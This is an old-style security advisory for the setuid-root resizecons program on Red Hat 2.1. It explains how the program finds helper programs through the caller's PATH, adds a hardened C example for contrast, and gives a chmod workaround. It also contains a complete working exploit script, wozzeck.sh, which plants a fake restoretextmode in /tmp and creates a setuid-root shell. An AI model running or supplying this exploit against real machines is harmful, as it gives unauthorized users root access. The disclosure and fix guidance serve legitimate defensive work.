COMMAND

    /usr/bin/resizecons (Red Hat 2.1)

AFFECTED SYSTEMS

    Red Hat 2.1 linux distribution

PROBLEM

    Red Hat 2.1 installs /usr/bin/resizecons setuid root.  resizecons
    lets a user change the video mode of the console.  To do this it
    runs the external program restoretextmode, and then setfont, by
    bare name rather than by absolute pathname, trusting the caller's
    PATH to locate the right binaries while still running with root
    privileges.  A user who puts a directory of their own first in
    PATH and drops a rogue restoretextmode (or setfont) there therefore
    gets an arbitrary program of their choosing executed as root.

    As a more amusing aside, resizecons also reads /tmp/selection.pid
    and sends the pid contained in it a SIGWINCH.  Since /tmp is world
    writable and the signal is sent with root privileges, any user on
    the system can force a screen redraw in an arbitrary process (one
    that handles SIGWINCH) on the machine.

    If /usr/bin/resizecons needs to be runnable by users other than
    root at the console, the code needs to be changed to execute the
    outside utilities by absolute pathname (with a fixed environment,
    not the caller's), and to check access rights on files before
    opening them: the program runs with an effective uid of 0, so the
    kernel will otherwise grant it access to any file the caller names.
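    The fix asked for above, as an added example that is not code from
    resizecons, Red Hat or this advisory: the vulnerable pattern (helper
    located through the caller's PATH from a setuid-root process) beside
    a hardened one that execs the helper by absolute path with a fixed
    environment and no shell, validates the mode argument before using
    it as a file name, and opens user-named files with the real user's
    rights.  The helper path /usr/bin/restoretextmode, the contents of
    SAFE_ENV and all function names are assumptions made for the example.

```c
/* Added example (not from the advisory or from resizecons): how a
 * setuid-root program should and should not invoke an external helper
 * and open files the caller names.  Paths and names are assumed. */
#define _GNU_SOURCE
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Environment handed to helpers: nothing inherited from the caller
 * (no attacker PATH, IFS, LD_* and so on).  Assumed value. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* VULNERABLE (the resizecons pattern): system() runs /bin/sh, which
 * resolves "restoretextmode" through the caller's PATH while the
 * effective uid is still 0.  Shown for contrast only. */
int run_helper_vulnerable(const char *mode)
{
    char cmd[128];
    snprintf(cmd, sizeof cmd, "restoretextmode -r %s", mode);
    return system(cmd);
}

/* resizecons modes look like COLSxROWS.  Accepting only digits and a
 * single 'x' keeps '/', '..' and shell metacharacters out of a string
 * that is later used both as a file name and as a helper argument. */
int is_valid_mode(const char *mode)
{
    size_t n = strlen(mode), i, xs = 0;
    if (n == 0 || n > 9)
        return 0;
    for (i = 0; i < n; i++) {
        if (mode[i] == 'x') {
            xs++;
            if (i == 0 || i == n - 1)
                return 0;
        } else if (!isdigit((unsigned char)mode[i])) {
            return 0;
        }
    }
    return xs == 1;
}

/* HARDENED: absolute path in argv[0], no shell, fixed environment.
 * Returns the helper's exit status, or 127 if it could not be run.
 * The helper keeps root here because (like restoretextmode) it needs
 * it for the console ioctls; that is exactly why path and environment
 * must not come from the caller. */
int run_helper(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return 127;
    if (pid == 0) {
        execve(argv[0], argv, SAFE_ENV);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return 127;
    return WIFEXITED(status) ? WEXITSTATUS(status) : 127;
}

/* Open a caller-named path with the *real* user's rights by dropping
 * the effective uid around the open(2).  The kernel then does the
 * permission check, which avoids the access()/open() race an access(2)
 * pre-check would leave open.  Returns -1 on any failure. */
int open_as_real_user(const char *path, int flags)
{
    uid_t saved = geteuid();
    if (seteuid(getuid()) < 0)
        return -1;
    int fd = open(path, flags);
    int saved_errno = errno;
    if (seteuid(saved) < 0) {          /* could not regain privilege */
        if (fd >= 0)
            close(fd);
        errno = EPERM;
        return -1;
    }
    errno = saved_errno;
    return fd;
}

int main(int argc, char **argv)
{
    if (argc != 2 || !is_valid_mode(argv[1])) {
        fprintf(stderr, "usage: %s COLSxROWS\n", argv[0]);
        return 2;
    }
    int fd = open_as_real_user(argv[1], O_RDONLY);   /* the mode file */
    if (fd < 0) {
        perror(argv[1]);
        return 1;
    }
    close(fd);
    /* Assumed absolute helper path; never a bare name. */
    char *const helper[] = { "/usr/bin/restoretextmode", "-r", argv[1], NULL };
    int rc = run_helper(helper);
    printf("restoretextmode exited with %d\n", rc);
    return rc;
}
```

    Against the wozzeck.sh attack below this makes the difference: with
    run_helper() the attacker's PATH=/tmp is never consulted, and with
    is_valid_mode() the mode argument cannot name a file outside the
    current directory.  The example is built with a main() so it can be
    run as an ordinary user; seteuid() is then a no-op and the program
    behaves the same, which is also what makes the pattern testable.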

--------------------------------------------------------------------
wozzeck.sh:
#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
#
# by Dave M. (davem@cmu.edu)
#
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
# Only worth trying while resizecons is still setuid (see SOLUTIONS).
if test -u /usr/bin/resizecons
then
    echo ++++++++++++++++ System appears vulnerable.
    cd /tmp
    # The mode file resizecons expects to find for the mode we ask for;
    # its contents do not matter, our restoretextmode never reads it.
    cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz.  Use it with care.
_EOF_
    # The rogue restoretextmode: run as root by resizecons, it copies
    # a shell to /tmp/wozz and makes it setuid root.
    cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
    /bin/chmod +x /tmp/restoretextmode
    # PATH is already exported, so resizecons inherits this value and
    # the only restoretextmode it can find is ours.
    PATH=/tmp
    echo ================ Executing resizecons
    /usr/bin/resizecons 313x37
    /bin/rm /tmp/restoretextmode
    /bin/rm /tmp/313x37
    if test -u /tmp/wozz
    then
        echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
    else
        echo ---------------- Exploit failed
    fi
else
    echo ---------------- This machine does not appear to be vulnerable.
fi
--------------------------------------------------------------------

SOLUTIONS

    A temporary workaround is to turn the setuid bit off (resizecons
    will then only work when run by root):

        chmod -s /usr/bin/resizecons

    and to confirm with ls -l /usr/bin/resizecons that the mode no
    longer shows an 's' in the owner's execute position.